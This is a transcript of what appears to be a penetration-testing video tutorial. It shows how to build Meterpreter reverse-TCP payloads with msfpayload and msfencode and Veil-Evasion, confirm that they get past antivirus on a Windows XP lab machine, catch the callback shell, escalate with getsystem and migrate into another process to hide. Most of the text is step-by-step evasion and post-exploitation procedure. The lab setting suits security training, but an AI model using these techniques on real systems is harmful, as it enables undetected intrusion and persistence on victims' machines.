Alright, I'm going to try to quickly move through this video, but this is going to be a pretty important video, and we're going to go into a little bit more about payloads and encoding. I know we've talked a lot about payloads, but the reality is now I'm going to leave my antivirus on, I'm going to leave my anti-exploit thing running, and my database is only outdated by about 8 days, so it's still pretty recent. And obviously the reason I'm on a host-only adapter, and so I'm just going to leave it alone. But it's only about 8 days out of date, and so we're going to be using stuff that's been in Metasploit for years. And a lot of times it will get flagged by the antivirus. It is really hit or miss. When we do these encodes, they're random encodes. So sometimes we can encode them 10 times and it works. Sometimes we can code them 100 times, and sometimes that will get flagged. So it's really hit or miss, but there's one program that I've always used. I've used it for probably almost about a year now, and it has never, ever, not once been detected by antivirus. So I will also show you that program. It's not actually in Metasploit, but we're going to go ahead and show you that anyways because I think it's that important. That could be the difference between if you're getting caught by antivirus or not. I trust that program much more than I would MSF Encode. So anyways, I do have an MSF console open. I've got that ready. But I'm going to need to go ahead and open up another terminal. And what we're going to go ahead and do is MSF payload. And we're going to go ahead and use Windows Meterpreter reverse TCP, and we're going to set our L host equals 192.168.1.101, which is mine, and our L port, which will run on, say, port 5566. I don't know, it can be anything. And we're going to generate this because we're gonna encode it, so we're going to put it out in raw format, so capital R. We're going to use the pipe, and we're going to pipe it through to MSF encode. Now, really quick, I'm just going to take a break from that, and let's look at MSF encode, something that we haven't done before. We can do a -L, and this will list all of the encoders. The reason that we haven't done this before is because it's already using the best one available by default. But you can see that it has a bunch of other encoders that you can use, and we'll see that the only one that is excellent is the Shikata Ganai, and that is what is used by default. That's what we've used before. But if you didn't want to use that, we can use the -E command and specify like x86, whatever encoder that we would want to use, and it would use that. So let's look at let me scroll down here so you can see it. MSF encode, and we can do, oops, forgot the F. There we go. And we can do a -H. This will do list all of the options so that you can get a better idea of different things you can do with MSF encode. So there we go. And we can see that the -E, again, we can specify the encoder that we want to use. And this is also cool, the -T, the type of output. There's a ton of stuff that we can output to. So if you want to get another idea, there you go. But anyways, we're gonna get away from this now. I just wanted to show you that, just so you had that information. So the MSF encode, we don't need to specify the encoder because it's going to use the default. We're not going to bind it to an existing exe. We're not going to use a template. So we don't need to keep any kind of original file functionality. We just really want to encode it. And so to do that, all I'm going to do is a -C, and let's encode it, let's say 10 times. And I'm going to use the greater than, and I'm going to name the file that we want to port it out to. Since we're using a capital R, that raw format is good enough to throw into an exe. So I don't need to tell it to create an exe. I can just tell it, like if I did a -T and then exe, we don't actually need to do that if we're going to use the capital R. So I'm just going to use the greater than sign, which is going to put that into a file, and let's name it MSF encode dash, and let's think of the port that we used is 5566. So 5566.exe. We're actually going to put that extension on the end. Let's hit enter, and we should see it encoded about 10 times. When this is done, let's go ahead and create one more, because we're actually going to test this against the antivirus and see see what happens. And it's really unpredictable. I can't tell you exactly what's going to happen because these are random encodes. So there's 10. And now I'm going to go ahead and encode this, let's say 50 times, and I'm going to just change this to a -2. That way it doesn't overwrite the exe that we did. And once we get into our MSF console, we're going to go ahead and upload these to the victim machine. This should be getting done anytime now. There we go, that's 50 times. So let's do an ls. And I've got a bunch of other stuff in here, but here's our MSF encode 5566. There's our second one that we did 50 times, and then our first one. So those are there. Now let's go over to our MSF console, and just to get things done quick, I can do our resource and our /root.msf4, our modules, and my quick load that I wanted to do. And I'm going to go ahead and just load that, and that's kind of a quick way that I'll get into the system. And we have a session open. Keep in mind that we are running the anti-exploit, which is not working very well, and our Malwarebytes is open and actively protecting the system. At least that's what it says. So now let's do a quick upload. We're going to do a /root, and the first one was what was it? It was MSF encode, and we did a 5566. It should have a .exe. There we go. So let's upload that first one, and let's upload it to the C drive. The second one that we're going to do is the -2. Oops, let me delete this part. And let's upload that. So we've uploaded both of these, and let's jump to our XP machine. And a lot of times it won't notice it until we actually either navigate to the folder, or if we double click on it, or if we just do a system scan. Let me go to my computer, and they should be in the C drive, which it is. And this one was the one that we encoded 10 times. So I can right click on that. Still nothing's come up. I'm going to go ahead and scan it. Oops, I don't know what I just did there. I think I sent it somewhere. Let's go ahead and just right click and scan. Let's see what happens here. Usually if it would have detected it, it would have already done it by now, so that's actually a good sign. And it should come up with a little report here of it doing its scan. It's just running slow. Alright, and so it's popped up. And let's see if it actually finds something. So it found it, or it scanned it, but it says no malicious items were detected. Alright. Let's scan our second one. I don't know if it's just going to use this or if it's going to open a separate one. Let's see. Oh. Anyways, while that's sitting there taking up our sweet time, what I'm going to do is I'm going to go back to our Kali machine, and let me show you the program that I think is completely awesome. Now it seems like our encoding, let's take a look at this, and it didn't find anything there. So that's pretty good. We lucked out. You may get different results than I did. I've encoded it 10 times, I've encoded it 100 times. There was one time I encoded it 100 times and it still was detected by the antivirus. So it's just going to be random. And so there's one program that I'm going to share with you. It does not come with Kali, but it's in the Kali repositories. And how you would get it is you would do an apt-get install veal. Program's name is veal evasion. but just put in veal. And that will install veal onto your system, but then there's a setup script. Now I can't go into it because I've already installed it. If you need help or something, or if you can't figure it out, just send me a message. But there is a setup script that you need to run, and that will run everything that you need to set up veal properly, because it is very picky. So to launch veal, we just type in veal, and we currently have 20 payloads. I'm sure as time goes on, when we update it, we'll probably get more. But what we can do is we can do a list. This will list the available ones that we can choose from. Let me see if it looks like I can't blow this up anymore. There we go. The one that is my favorite is number 13, which it may be different. The number may be different for you if this thing updates, but it's the Python/AES encrypted. Now there's other ones. There's PowerShell. There's also C that you can do. There's a C#, but the AES encrypted has been absolutely awesome. It is. I have never had it been detected, so that's just going off of my experience. And I've had a lot of the MSF encode ones get detected. So if I need something to trust, I'm going to trust veal. It's never let me down. I'm sure eventually there'll be some hiccups, but so far so good. So I'm going to choose 13. And so what we're going to do is we're going to do use and then the number 13. And what we're going to do is we're going to set this flag here. It shows us options. This is not required. Compile to exe. We're going to say yes. Occasionally it has a mistake and it won't compile the exe, so we may need to redo it, but we definitely want to get the exe, which is already set to yes. And as an additional method, kind of an enhanced security, or trying to get yourself past that antivirus a little bit more, have a little bit more success, I should say, we're going to set this flag to yes. So I'm going to do set, just like in Metasploit, and the name, and we're going to set it to Y. So now if I do an info, we can see that it is currently set to Y. Alright, and we can also look at the description since we're looking at the info. The shellcode is decrypted at runtime with key in file. It's injected into memory and executed. So that's pretty sweet. So all we need to do now at this point is do generate. Generate. There we go. And we haven't talked about MSF Venom, but we're going to go ahead and just hit enter. We don't need to actually put 1. Yes, I know it gave me a warning there, but if you just put enter, the default is MSF Venom anyways. And check this out. We can press enter automatically for Windows Meterpreter Reverse TCP. So that's also the default. So I'm going to just hit enter. Now we need the L host. So 192.168.1.101. Our L port. What L port do we want to do? I guess we can do 7777. And this wants to know any extra options that we want to type in. We don't need to do that, so I just hit enter. So this is kind of a nice little interface. You know, it's kind of, it just asks you questions and it kind of does it for you. Once it's done generating the shellcode, it's going to ask us to name it. So I'm going to name it veal-7777. So that kind of like help. If we start generating a lot of payloads, these numbers will tell me the port that I chose. So what I'm going to go and do is I'm going to do just the option number 1, which is the default. And this should generate our exe. Occasionally it doesn't, but we have another option, which is number 2, which we can also try that if we need to. Once this is done, then it's going to put it into a universal folder called veal-output. Alright, let's see if it did it. It says that it wrote the executable, and here's the location. So I'm going to go ahead and hit enter, and where it puts it is in, let me go ahead and get out of this here, exit, and what I can do is do a cd/, it's already in, we're actually already in the root, so if we do an ls, here's our veal output. So cd veal output, do an ls, and anything compiled, it compiled in exe, is going to be in our compiled folder. So what we can do is just cd compiled, do an ls, and there's our veal777.exe. So now what we're going to do is go back to our interpreter, and let's do an upload. So we're going to upload, it's going to be /root /veal output /compiled, and the name of the executable, we'll also put it in C://, and let's go ahead and upload that. And now what we can do is jump back to the XP machine, and it gives us a special little nice disk with like a little Python on there. And so this is just another option. Now we can go ahead and scan that, see if that's detected. But anyways, guys, that's pretty much the gist of the video. I wanted to show you a couple different things encoding at different times. You may have got different results, but I definitely trust Veal. It's never let me down. Like I've said before, MS7Encode, not to say anything bad about it, but it has been flagged many times, but I have never had Veal flag an antivirus, so I trust Veal. And let's go ahead and just wait just to show that it's good, hopefully. And scan completed. No malicious items were detected. So all in all, we got the same results with everything. But anyways, guys, I just wanted to show you those. Hope you enjoyed the video. I know we did a lot of talking, but as usual, I like to be thorough. And again, hope you guys enjoyed the video. See you in the next one. Actually, one more thing before I leave. I guess we should try and actually execute these just to show that they work. What I'll do is the MS7Encodes we know will work, and since we haven't seen Veal before, at least you guys haven't seen it, let's go ahead and execute those. And what I'll go ahead and do is exit out of this interpreter session, and I'm going to use exploit multi handler, and we're going to set the L port to all 7s because that's what we set it to. And I'm going to go ahead and just run. We can run it or exploit it. It should both work. Let's make sure that it runs on 7777, which it did. And now let's just go ahead and double click our Veal payload. Keep in mind everything is still running there. Let's go back to our Kali. We can see that it caught our interpreter session 7777 and nothing happened. So again, any kind of payload that's this actually put a shortcut on here, this MSFencode. Weird, I've never actually seen that do that. But anyways, again, if we look in the XP, where is it here? We'll do a send control alt delete. We will see this running most probably. Hey, Veal 7777, there it is again down there. So we need to migrate away as fast as we can, just in case someone closes it or notices it. So I can do a PS, and this time if I do a get UID, I may have admin privs or not, I don't know. So we can do a get system, and hopefully this works. Okay, it did. We can get UID. Again, we are now the NT authority, so now we can migrate away from this, and we can go ahead and migrate. We'll try this process this time. 732, migrate 732, and once this is done, we'll check our processes again. Okay, it's migrated. Let's do a PS, and we'll notice that all those Veal 7777s have disappeared. We can go back over here, do another control alt delete. We can see that all of those are not running. So again, the faster we can migrate away from those processes, they disappear and we're kind of invisible at that point, so to speak, to the naked eye anyway. So now we're done, guys. Hope you enjoyed the video. See you next time.